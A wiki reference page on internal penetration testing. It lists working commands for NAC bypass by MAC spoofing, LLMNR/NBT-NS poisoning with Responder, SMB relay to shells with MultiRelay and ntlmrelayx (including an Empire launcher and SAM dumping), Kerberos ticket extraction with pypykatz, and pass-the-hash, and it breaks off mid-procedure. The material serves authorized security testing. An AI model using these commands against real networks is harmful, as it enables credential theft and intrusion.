Link to this headingInternal Penetration Testing Guide

Hack Ticks Wiki

Additional Tools
The following tools are not installed by default in the prerequisite toolset, but provide significant value in certain scenarios during testing:

Link to this headingLogging Configuration

Windows (PowerShell):
The PowerShell file below will automatically load and execute whenever a PowerShell prompt is opened. This will maintain persistent logging/history of PowerShell commands (with and without timestamps).

  1. Create the following file:
C:\Users\[USERNAME]\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  1. Save the following PowerShell code to this file:
# Set file/folder to save history $HistoryFilePath = "$([Environment]::GetFolderPath('UserProfile'))\PowerShellLogs\ps_history-$(Get-Date -f MM-dd-yyyy).txt" $HistoryFilePathTimeStamped = "$([Environment]::GetFolderPath('UserProfile'))\PowerShellLogs\Timestamped\ps_history-TIMESTAMPED-$(Get-Date -f MM-dd-yyyy).txt" # Output history destination file/folder to stdout write-host "History will be written to the following files upon exiting: " write-host "$HistoryFilePath" -foregroundcolor "green" write-host "$HistoryFilePathTimeStamped" -foregroundcolor "green" # Upon exit, dump history to file Register-EngineEvent PowerShell.Exiting -Action { Get-Date -Format g | Out-File -FilePath $HistoryFilePath -Append Get-History | Out-File -FilePath $HistoryFilePath -Append } | out-null # Upon exit, dump history with timestamps to file Register-EngineEvent PowerShell.Exiting -Action { Get-History | FL | Out-File -FilePath $HistoryFilePathTimeStamped -Append } | out-null # Adds ability to scroll history using up/down keys Set-PSReadlineKeyHandler -Key UpArrow -Function HistorySearchBackward Set-PSReadlineKeyHandler -Key DownArrow -Function HistorySearchForward

Metasploit:
The configuration file described below will automatically run whenever msfconsole is launched. This will ensure a history is kept (both input and output) of both standard MSF commands/modules, but also sessions (e.g., Meterpreter shell).

  1. Create the following file:
>>> head -n 8 /root/.msf4/msfconsole.rc #[framework/core] setg SessionLogging true setg TimestampOutput true setg ConsoleLogging true setg LogLevel 3 setg PROMPT [%yel%T%whi] { %grnS:%S J:%J%whi} %whi%W spool /root/.msf4/logs/spool.log #[framework/ui/console]

Link to this headingNetwork Access Control (NAC) Testing

Check if you get an address from DHCP if not then there may be a NAC.

Link to this headingMAC Filtering Bypass

Get Mac address from Other devices including VoIP Phones

Set Mac Address:

macchanger --mac=XX:XX:XX:XX:XX:XX eth0

Link to this headingIPv6 Traffic Exclusion

Utilize nmap’s “-6” option and/or Metasploit’s “ipv6_multicast_ping” and “ipv6_neighbor” modules for IPv6 host discovery, as some NAC solutions strictly focus on IPv4 traffic.

List IPV6 addresses with Metasploit:

sudo msfconsole -q msf > use auxiliary/scanner/discovery/ipv6_multicast_ping msf auxiliary(ipv6_multicast_ping) > set RHOSTS fe80::4dc4:bd17:56a1:a472/64 msf auxiliary(ipv6_multicast_ping) > run [*] Running module against fe80:: [*] Sending multicast pings... [*] Listening for responses... [*] |*| fe80::103a:5e16:5a41:6687 => 36:d0:0d:4b:26:64

Scan IPv6 addresses with Nmap:

nmap -6 -sV fe80::103a:5e16:5a41:6687

Link to this headingDedicated NAC Bypass Device (Intrusive)

A dedicated physical device (e.g., Pwnplug) can be connected to a target machine and configured to bypass the implemented NAC mechanism.

Link to this headingPassive Reconnaissance / Information Gathering

Link to this headingResponder

Use the forked Responder.

Hashes Sored in /usr/share/responder/logs/[PROTOCOL]-[HASHTYPE]-[IPADDRESS].txt

Check for LLMNR/NBT-NS Requests:

responder -A -I [interface]

Actively Poison LLMNR/NBT-NS Requests:

responder -I [interface]

Link to this headingCredential Theft/Reuse

Link to this headingSMB/NetNTLM Relay

If the Host has SMB Message Signing disabled then it is possible to relay Credentials. The destination also needs SMB Message Signing disabled also. By default Non Server Windows have SMB Signing disabled by default.

Since MS08-068 it is not possible to relay credentials back to the same machine on the same protocol.

Testing for SMB Message Signing Nmap:

nmap -sS -Pn -n -p 139,445 --script smb-security-mode [TARGETSUBNET]

Testing for SMB Message Signing Responder:

python /usr/share/responder-multirelay/tools/RunFinger.py -g -i [TARGETSUBNET]

Testing for SMB Message Signing CrackMapExec:

cme smb [TARGETSUBNET] --gen-relay-list [OUTPUTFILE]

Other service testing with responder:

root@kali:/etc/responder# head -15 Responder.conf [Responder Core] ; Servers to start SQL = On SMB = Off Kerberos = On FTP = On POP = On SMTP = On IMAP = On HTTP = Off HTTPS = On DNS = On LDAP = On

Responder with Redirections:

responder -I [INTERFACE] -rv

Using Responder to get shells:
Running the MultiRelay command below will result in a shell if a relayed authentication request is successful.
the -u parameter allows all users to be relayed

python /usr/share/responder/tools/MultiRelay.py -t [TARGETIP] -u ALL # Single User Relay python /usr/share/responder/tools/MultiRelay.py -t [TARGETIP] -u Admin

Impacket Powershell Command:

#If no command is provided the SAM database will be dumped by default. python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf [TARGETSFILE] -c [EMPIRE POWERSHELL LAUNCHER COMMAND]
  1. The resulting MultiRelay shell offers extended functionality, detailed in Laurent Gaffie’s blog post, including remote Mimikatz commands.

Link to this headingPass-the-Hash (PTH)

This technique requires a previously compromised NTLM/LM hash of an account’s password. Note that this cannot be done using NetNTLM/NTLMv1/NTLMv2 hashes that are collected using Responder or similar tools.

  1. Compromise an NTLM/LM hash
  2. Determine which machines the corresponding account (for the hash) has access to. This can be done in several ways:
    1. Leverage Active Directory reconnaissance techniques to enumerate a list of logged on users for all target machines. This is best accomplished using PowerView, which is one of the Recon modules of PowerSploit. S

Link to this headingMimikatz

Link to this headingpypykatz

Mimikatz implementation in pure Python.

Dumping Kerberos Tickers from a dump file:

>>> pypykatz lsa -k /root/data/kerberos minidump lsass.dmp INFO:root:Parcing file lsass.dmp FILE: ========= lsass.dmp ======= [...] >>> ls /root/data/kerberos lsass.dmp_768ec70d.ccache TSG_WINLAB.COM_CLIENT01$_krbtgt_WINLAB.COM-dc16ff32.kirbi [...]

Viewing Kerberos Tickets:

>>> kirbi2ccache TSG_WINLAB.COM_CLIENT01$_krbtgt_WINLAB.COM-dc16ff32.{kirbi,ccache} >>> export KRB5CCNAME=/path/to/.ccache >>> klist Ticket cache: FILE:/root/data/kerberos/Admin.ccache Default principal: [email protected] Valid Starting Expires Service Principal 11/21/2019 20:39:01 11/22/2019 06:39:01 krbtgt/[email protected] renew until 11/28/2019 20:39:01

Using Kerberos Tickets:

>>> wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

Link to this headingMimipenguin

A tool to dump the login passwords from memory

Link to this headingActive Directory Reconnaissance

Link to this headingUse Domain Account Without Domain-Joined Computer

Using a compromise domain user account, you can leverage the following technique to execute commands that interact with the target domain without using a domain-joined machine. Instead, you can run commands directly within your Windows testing machine/VM.

  1. Launch a command prompt (cmd.exe)
  2. Execute the following command. Note that the “PROGRAM” argument can be any program on your machine/VM, including cmd.exe, powershell.exe, mimikatz, etc. In this example, we’ll launch cmd.exe and subsequently PowerShell (bypassing the execution policy using “-exec bypass”).
  3. Enter the account password
  4. Execute the following commands:
  5. You can then confirm that you are running as the authenticated domain user within the target domain by issuing the following command: